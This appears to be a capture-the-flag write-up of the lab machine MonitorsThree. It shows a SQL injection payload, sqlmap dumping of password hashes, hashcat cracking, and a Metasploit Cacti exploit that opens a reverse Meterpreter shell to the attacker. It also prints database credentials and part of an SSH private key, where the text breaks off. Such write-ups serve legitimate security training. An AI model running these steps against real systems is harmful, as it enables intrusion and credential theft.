# MonitorsThree

## Synopsis

**MonitorsThree** is a medium linux machine created by **ruycr4ft** and **kavigihan**. The http service hosts the **monitorsthree.htb** domain. The vhost **cacti.monitorsthree.htb** uses the **cacti** version **1.2.26** which is vulnerable to **CVE-2024-25641 arbitrary file write** vulnerability. The domain has ***forget-password.php*** which is vulnerable to **sql injection** and the **cacti** login credentials is gained. **CVE-2024-25641** is exploited using the gained credentials which gives us a shell as **www-data**. The cacti ***config file*** has a **`mysql`** crediantials. Logging into the **`mysql`** database gives us the **marcus** user password, we change the user to **marcu**s and fetch the ***id\_rsa*** for **`ssh`** login. The marcus runs the **duplicati** service in port 8200, we can **bypass** the duplicati login and exploit to gain the shell as **root**.

| OS    | Difficulty | Points | Release Date | Retired Date |
| ----- | ---------- | ------ | ------------ | ------------ |
| Linux | Medium     | 30     | 24-08-2024   | 18-01-2025   |

***

## OSINT

### Previous Machines

The previously released **Monitors** and **MonitorsTwo** machinces are vulnerable to **sql injection** and **command injection**, the **vhost** cacti or domain uses the **cacti** service and the user **marcus** is present.

{% tabs %}
{% tab title="Monitors" %}
[**https://www.hackthebox.com/machines/monitors**](https://www.hackthebox.com/machines/monitorstwo)
{% endtab %}

{% tab title="MonitorsTwo" %}
[**https://www.hackthebox.com/machines/monitorstwo**](https://www.hackthebox.com/machines/monitorstwo)
{% endtab %}
{% endtabs %}

***

## Enumeration

### Nmap

Started the **`nmap`** scan and found the ssh and http services running.

```bash
nmap -Pn -sC -sV --min-rate=500 10.10.11.30 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-13 19:56 EST
Nmap scan report for 10.10.11.30
Host is up (1.9s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://monitorsthree.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.60 seconds
```

Add the **monitorsthree.htb** and **cacti.monitorsthree.htb** into ***/etc/hosts*** file.

### Web - monitorsthree.htb

The **monitorsthree** provides the networking solutions to the businesses.

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2FsPfse36MAE1D9e3TjgKo%2Fmonitorsthree-website.png?alt=media&#x26;token=248e2fb9-93c6-46e3-9f24-b14eac8564e0" alt=""><figcaption></figcaption></figure>

The **login page** provides us the login form and **forget password** form is vulnerable to **sql injection**. It is also conformed that the user **admin** is present because the password reset instruction is send successfully. The **payload** I have used for identifying the **sql injection** is given below.

```sql
admin'OR'1'='1
```

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2F67U6Mewhe74rlN3ElZRK%2Fsql_injection.png?alt=media&#x26;token=6d82a54e-6add-48a6-8452-7cee2797cbf8" alt=""><figcaption></figcaption></figure>

The syntax error conforms that the database is **MariaDB** database.

### Web - cacti.monitorsthree.htb

The vhost cacti is present and it is using cacti version **1.2.26** which is vulnerable to **CVE-2024-25641** and can be exploited using **`metasploit`** once we get the cacti login credentials.

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2FLie5E18fH10U6ZDZhTjk%2Fcacti_login.png?alt=media&#x26;token=d24b2197-ce6f-4934-88b0-67bbac94ed1f" alt=""><figcaption></figcaption></figure>

***

## Exploit

### SQL Injection - forget-password

The **sql injection** found in domain is exploited using **sqlmap** for gaining cacti login credentials.

* Intercept the forget password request using **`burpsuite`**.

<figure><img src="https://2174268648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fub7j4GBqzIfnf6FfkeT7%2Fuploads%2FsNTaSgMLOEdwMqq0sqed%2Fburp_intercept.png?alt=media&#x26;token=f40fbe3b-02fe-4a92-9e5a-7a4886b88b7a" alt=""><figcaption></figcaption></figure>

* Copy and paste the request into the file.

{% tabs %}
{% tab title="DBS enumeration" %}

```bash
sqlmap -r request.txt --batch --dbs 
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.8.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:40:43 /2025-01-14/

[07:40:43] [INFO] parsing HTTP request from 'request.txt'
[07:40:43] [INFO] testing connection to the target URL
got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
[07:40:55] [INFO] testing if the target URL content is stable
[07:41:04] [WARNING] POST parameter 'username' does not appear to be dynamic
[07:41:14] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[07:41:23] [INFO] testing for SQL injection on POST parameter 'username'
[07:41:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:42:00] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:42:10] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:42:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:43:37] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:44:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:45:10] [INFO] testing 'Generic inline queries'
[07:45:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[07:45:19] [WARNING] time-based comparison requires larger statistical model, please wait. (done)                                                                           
[07:45:25] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[07:46:05] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[07:46:50] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[07:47:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:49:04] [INFO] POST parameter 'username' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[07:49:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:49:04] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:51:53] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 8237 FROM (SELECT(SLEEP(5)))WsJa) AND 'uTpu'='uTpu
---
[07:53:45] [INFO] the back-end DBMS is MySQL
[07:53:45] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:54:15] [INFO] fetching database names
[07:54:15] [INFO] fetching number of databases
[07:54:15] [INFO] retrieved: 2
[07:55:49] [INFO] retrieved: information_schema
[08:34:47] [INFO] retrieved: monit
[08:49:33] [ERROR] invalid character detected. retrying..
orsthree_db
available databases [2]:
[*] information_schema
[*] monitorsthree_db

[09:13:10] [INFO] fetched data logged to text files under '/home/dexter/.local/share/sqlmap/output/monitorsthree.htb'

[*] ending @ 09:13:10 /2025-01-14/
```

{% endtab %}

{% tab title="User Table Dumping" %}

```bash
sqlmap -r request.txt --batch -T users -C username,password -D monitorsthree_db --time-sec=10 --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.12#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:00:24 /2025-01-15/

[03:00:24] [INFO] parsing HTTP request from 'request.txt'
[03:00:24] [INFO] resuming back-end DBMS 'mysql' 
[03:00:24] [INFO] testing connection to the target URL
got a 302 redirect to 'http://monitorsthree.htb/forgot_password.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 8237 FROM (SELECT(SLEEP(10)))WsJa) AND 'uTpu'='uTpu
---
[03:00:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[03:00:38] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'monitorsthree_db'
[03:00:38] [INFO] fetching number of column(s) 'password,username' entries for table 'users' in database 'monitorsthree_db'
[03:00:38] [INFO] resumed: 4
[03:00:38] [INFO] resumed: 1e68b6eb86b45f6d92f8f292428f77ac
[03:00:38] [INFO] resumed: janderson
[03:00:39] [INFO] resumed: 31a181c8372e3afc59dab863430610e8
[03:00:39] [INFO] resuming partial value: admi
[03:00:39] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)                                       
[03:06:59] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[03:07:58] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
n
[03:13:20] [INFO] retrieved: 633b683cc128fe244
[04:22:44] [ERROR] invalid character detected. retrying..
b
[04:30:04] [ERROR] invalid character detected. retrying..
^C^C
[04:33:13] [WARNING] Ctrl+C detected in dumping phase                                                                                                                       
[04:33:13] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[04:33:13] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[04:33:13] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[04:33:13] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[04:33:13] [INFO] starting 8 processes 
[04:33:18] [WARNING] no clear password(s) found                                                                                                                             
Database: monitorsthree_db
Table: users
[2 entries]
+-----------+----------------------------------+
| username  | password                         |
+-----------+----------------------------------+
| janderson | 1e68b6eb86b45f6d92f8f292428f77ac |
| admin     | 31a181c8372e3afc59dab863430610e8 |
+-----------+----------------------------------+

[04:33:18] [INFO] table 'monitorsthree_db.users' dumped to CSV file '/home/dexter/.local/share/sqlmap/output/monitorsthree.htb/dump/monitorsthree_db/users.csv'
[04:33:18] [INFO] fetched data logged to text files under '/home/dexter/.local/share/sqlmap/output/monitorsthree.htb'

[*] ending @ 04:33:18 /2025-01-15/
```

{% endtab %}
{% endtabs %}

{% hint style="info" %}
I have termited the sqlmap during user dumping when I have extracted the admin hash.
{% endhint %}

The admin hash is crack-able using **`hashcat`** and ***rockyou.txt.*** It gives us the credentials for cacti.

```bash
hashcat -a 0 -m 0 31a181c8372e3afc59dab863430610e8 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

31a181c8372e3afc59dab863430610e8:greencacti2001           
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 31a181c8372e3afc59dab863430610e8
Time.Started.....: Wed Jan 15 04:37:07 2025 (2 secs)
Time.Estimated...: Wed Jan 15 04:37:09 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  5462.9 kH/s (0.11ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 7786496/14344385 (54.28%)
Rejected.........: 0/7786496 (0.00%)
Restore.Point....: 7782400/14344385 (54.25%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: grega1987tomazin -> green3484
Hardware.Mon.#1..: Temp: 57c Util: 32%

Started: Wed Jan 15 04:37:06 2025
Stopped: Wed Jan 15 04:37:10 2025

```

The **crediantials** for cacti is **admin:greencacti2001**

## Foothold

### Shell - www-data

The gained **crediantials** can be used for **CVE-2024-25641** vulnerability. Use the **`metasploit`** for exploiting the vulnerability. The more details about the CVE is found here.

{% embed url="<https://www.cvedetails.com/cve/CVE-2024-25641/>" %}

```bash
sudo msfdb run
[sudo] password for dexter: 

[msf](Jobs:0 Agents:0) >> use exploit/multi/http/cacti_package_import_rce
[*] Using configured payload php/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> show options

Module options (exploit/multi/http/cacti_package_import_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       Password to login with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /cacti           yes       The base URI of Cacti
   USERNAME   admin            yes       User to login with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set PASSWORD greencacti2001
PASSWORD => greencacti2001
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set RHOSTS tun0
RHOSTS => tun0
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set RHOSTS 10.10.11.30
RHOSTS => 10.10.11.30
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set LHOST tun0
LHOST => 10.10.16.17
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set LPORT 8443
LPORT => 8443
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> set VHOST cacti.monitorsthree.htb
VHOST => cacti.monitorsthree.htb
[msf](Jobs:0 Agents:0) exploit(multi/http/cacti_package_import_rce) >> exploit
[*] Started reverse TCP handler on 10.10.16.17:8443 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `admin` and password `greencacti2001`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[*] Triggering the payload
[*] Sending stage (40004 bytes) to 10.10.11.30
[+] Deleted /var/www/html/cacti/resource/WjGjZHBPj.php
[*] Meterpreter session 1 opened (10.10.16.17:8443 -> 10.10.11.30:46276) at 2025-01-14 20:47:43 -0500

(Meterpreter 1)(/var/www/html/cacti/resource) >
```

***

## Privilege Escalation

### Pillaging - www-data \[user]

The **www-data** has a cacti ***config file*** which contains the password for **`mysql`** and  the **auth\_user** table contains the user **marcus** hash which is crackable using ***rockyou.txt*** wordlist.

{% tabs %}
{% tab title="Config File" %}

```bash
(Meterpreter 1)(/var/www/html/cacti/resource) > cd ../include
(Meterpreter 1)(/var/www/html/cacti/include) > cat config.php
----- SNIP -----
$database_type     = 'mysql';
$database_default  = 'cacti';
$database_hostname = 'localhost';
$database_username = 'cactiuser';
$database_password = 'cactiuser';
$database_port     = '3306';
$database_retries  = 5;
$database_ssl      = false;
$database_ssl_key  = '';
$database_ssl_cert = '';
$database_ssl_ca   = '';
$database_persist  = false;
----- SNIP -----
(Meterpreter 1)(/var/www/html/cacti/include) > shell
Process 15797 created.
Channel 0 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

{% endtab %}

{% tab title="auth\_user" %}

```bash
(Meterpreter 1)(/var/www/html/cacti/include) > shell
Process 15797 created.
Channel 0 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@monitorsthree:~/html/cacti/include$ mysql -u cactiuser -p cacti
mysql -u cactiuser -p cacti
Enter password: cactiuser

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 21843
Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [cacti]> USE cacti;
USE cacti;
Database changed
MariaDB [cacti]> SHOW TABLES;
SHOW TABLES;
+-------------------------------------+
| Tables_in_cacti                     |
+-------------------------------------+
| aggregate_graph_templates           |
| aggregate_graph_templates_graph     |
| aggregate_graph_templates_item      |
| aggregate_graphs                    |
| aggregate_graphs_graph_item         |
| aggregate_graphs_items              |
| automation_devices                  |
| automation_graph_rule_items         |
| automation_graph_rules              |
| automation_ips                      |
| automation_match_rule_items         |
| automation_networks                 |
| automation_processes                |
| automation_snmp                     |
| automation_snmp_items               |
| automation_templates                |
| automation_tree_rule_items          |
| automation_tree_rules               |
| cdef                                |
| cdef_items                          |
| color_template_items                |
| color_templates                     |
| colors                              |
| data_debug                          |
| data_input                          |
| data_input_data                     |
| data_input_fields                   |
| data_local                          |
| data_source_profiles                |
| data_source_profiles_cf             |
| data_source_profiles_rra            |
| data_source_purge_action            |
| data_source_purge_temp              |
| data_source_stats_daily             |
| data_source_stats_hourly            |
| data_source_stats_hourly_cache      |
| data_source_stats_hourly_last       |
| data_source_stats_monthly           |
| data_source_stats_weekly            |
| data_source_stats_yearly            |
| data_template                       |
| data_template_data                  |
| data_template_rrd                   |
| external_links                      |
| graph_local                         |
| graph_template_input                |
| graph_template_input_defs           |
| graph_templates                     |
| graph_templates_gprint              |
| graph_templates_graph               |
| graph_templates_item                |
| graph_tree                          |
| graph_tree_items                    |
| host                                |
| host_graph                          |
| host_snmp_cache                     |
| host_snmp_query                     |
| host_template                       |
| host_template_graph                 |
| host_template_snmp_query            |
| plugin_config                       |
| plugin_db_changes                   |
| plugin_hooks                        |
| plugin_realms                       |
| poller                              |
| poller_command                      |
| poller_data_template_field_mappings |
| poller_item                         |
| poller_output                       |
| poller_output_boost                 |
| poller_output_boost_local_data_ids  |
| poller_output_boost_processes       |
| poller_output_realtime              |
| poller_reindex                      |
| poller_resource_cache               |
| poller_time                         |
| processes                           |
| reports                             |
| reports_items                       |
| rrdcheck                            |
| sessions                            |
| settings                            |
| settings_tree                       |
| settings_user                       |
| settings_user_group                 |
| sites                               |
| snmp_query                          |
| snmp_query_graph                    |
| snmp_query_graph_rrd                |
| snmp_query_graph_rrd_sv             |
| snmp_query_graph_sv                 |
| snmpagent_cache                     |
| snmpagent_cache_notifications       |
| snmpagent_cache_textual_conventions |
| snmpagent_managers                  |
| snmpagent_managers_notifications    |
| snmpagent_mibs                      |
| snmpagent_notifications_log         |
| user_auth                           |
| user_auth_cache                     |
| user_auth_group                     |
| user_auth_group_members             |
| user_auth_group_perms               |
| user_auth_group_realm               |
| user_auth_perms                     |
| user_auth_realm                     |
| user_auth_row_cache                 |
| user_domains                        |
| user_domains_ldap                   |
| user_log                            |
| vdef                                |
| vdef_items                          |
| version                             |
+-------------------------------------+
113 rows in set (0.001 sec)

MariaDB [cacti]> SELECT * FROM user_auth;
SELECT * FROM user_auth;
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
| id | username | password                                                     | realm | full_name     | email_address            | must_change_password | password_change | show_tree | show_list | show_preview | graph_settings | login_opts | policy_graphs | policy_trees | policy_hosts | policy_graph_templates | enabled | lastchange | lastlogin | password_history | locked | failed_attempts | lastfail | reset_perms |
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
|  1 | admin    | $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G |     0 | Administrator | marcus@monitorsthree.htb |                      |                 | on        | on        | on           | on             |          2 |             1 |            1 |            1 |                      1 | on      |         -1 |        -1 | -1               |        |               0 |        0 |   436423766 |
|  3 | guest    | $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu |     0 | Guest Account | guest@monitorsthree.htb  |                      |                 | on        | on        | on           |                |          1 |             1 |            1 |            1 |                      1 |         |         -1 |        -1 | -1               |        |               0 |        0 |  3774379591 |
|  4 | marcus   | $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK |     0 | Marcus        | marcus@monitorsthree.htb |                      | on              | on        | on        | on           | on             |          1 |             1 |            1 |            1 |                      1 | on      |         -1 |        -1 |                  |        |               0 |        0 |  1677427318 |
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
3 rows in set (0.000 sec)

MariaDB [cacti]> 

```

{% endtab %}
{% endtabs %}

### Shell - marcus

Crack the hash using the **hashcat**.

```bash
hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72

Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

$2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK:12345678910
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: hash
Time.Started.....: Tue Jan 14 22:34:55 2025 (6 mins, 4 secs)
Time.Estimated...: Fri Jan 17 09:02:00 2025 (2 days, 10 hours)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      136 H/s (7.20ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/3 (33.33%) Digests (total), 1/3 (33.33%) Digests (new), 1/3 (33.33%) Salts
Progress.........: 73792/43033155 (0.17%)
Rejected.........: 0/73792 (0.00%)
Restore.Point....: 24576/14344385 (0.17%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:256-272
Candidate.Engine.: Device Generator
Candidates.#1....: 280690 -> 020693
Hardware.Mon.#1..: Temp: 85c Util: 92%

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => q

                                                          
Session..........: hashcat
Status...........: Quit
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: hash
Time.Started.....: Tue Jan 14 22:34:55 2025 (6 mins, 27 secs)
Time.Estimated...: Fri Jan 17 08:56:25 2025 (2 days, 10 hours)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      137 H/s (7.10ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/3 (33.33%) Digests (total), 1/3 (33.33%) Digests (new), 1/3 (33.33%) Salts
Progress.........: 78656/43033155 (0.18%)
Rejected.........: 0/78656 (0.00%)
Restore.Point....: 26176/14344385 (0.18%)
Restore.Sub.#1...: Salt:2 Amplifier:0-1 Iteration:640-656
Candidate.Engine.: Device Generator
Candidates.#1....: 241987 -> 100785
Hardware.Mon.#1..: Temp: 85c Util: 94%

Started: Tue Jan 14 22:34:14 2025
Stopped: Tue Jan 14 22:41:23 2025
```

The password cannot be used for **`ssh`** login as **marcus** but we can change the user to marcus using the **`su`** from the previously gained shell and copy the ***id\_rsa*** file to **`ssh`** into it.

{% tabs %}
{% tab title="SSH Login Try" %}

```bash
ssh marcus@10.10.11.30
The authenticity of host '10.10.11.30 (10.10.11.30)' can't be established.
ED25519 key fingerprint is SHA256:1llzaKeglum8R0dawipiv9mSGU33yzoUW3frO9MAF6U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.30' (ED25519) to the list of known hosts.
marcus@10.10.11.30: Permission denied (publickey).
```

{% endtab %}

{% tab title="Getting id\_rsa" %}

```bash
(Meterpreter 1)(/var/www/html/cacti/include) > shell
Process 16195 created.
Channel 1 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@monitorsthree:~/html/cacti/include$ su marcus
su marcus
Password: 12345678910

marcus@monitorsthree:/var/www/html/cacti/include$ cat ~/.ssh/id_rsa
cat ~/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAqgvIpzJXDWJOJejC3CL0m9gx8IXO7UBIfGplG1XCC6GhqPQh8OXK
rPkApFwR1k4oJkxQJi0fG2oSWmssfwqwY4FWw51sNIALbSIV3UIlz8/3ufN0zmB4WHacS+
k7hOP/rJ8GjxihThmh6PzC0RbpD/wCCCvF1qX+Bq8xc7797xBR4KfPaA9OgB0uvEuzVWco
MYII6QvznQ1FErJnOiceJoxRrl0866JmOf6moP66URla5+0sLta796+ARDNMQ2g4geh53p
ja3nZYq2QAi1b66GIRmYUGz4uWunRJ+6kUvf7QVmNgmmnF2cVYFpdlBp8WAMZ2XyeqhTkh
Z4fg6mwPyQfloTFYxw1jv96F+Kw4ET1tTL+PLQL0YpHgRTelkCKBxo4/NiGs6LTEzsucyq
Dedke5o/5xcIGnU/kTtwt5xXZMqmojXOywf77vomCuLHfcyePf2vwImF9Frs07lo3ps7pK
ipf5cQ4wYN5V7I+hFcie5p9eeG+9ovdw7Q6qrD77AAAFkIu0kraLtJK2AAAAB3NzaC1yc2
EAAAGBAKoLyKcyVw1iTiXowtwi9JvYMfCFzu1ASHxqZRtVwguhoaj0IfDlyqz5AKRcEdZO
